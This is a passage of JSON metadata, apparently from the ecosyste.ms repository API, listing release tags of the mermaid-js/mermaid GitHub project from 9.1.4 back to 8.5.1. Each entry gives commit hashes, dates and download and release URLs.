ed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/a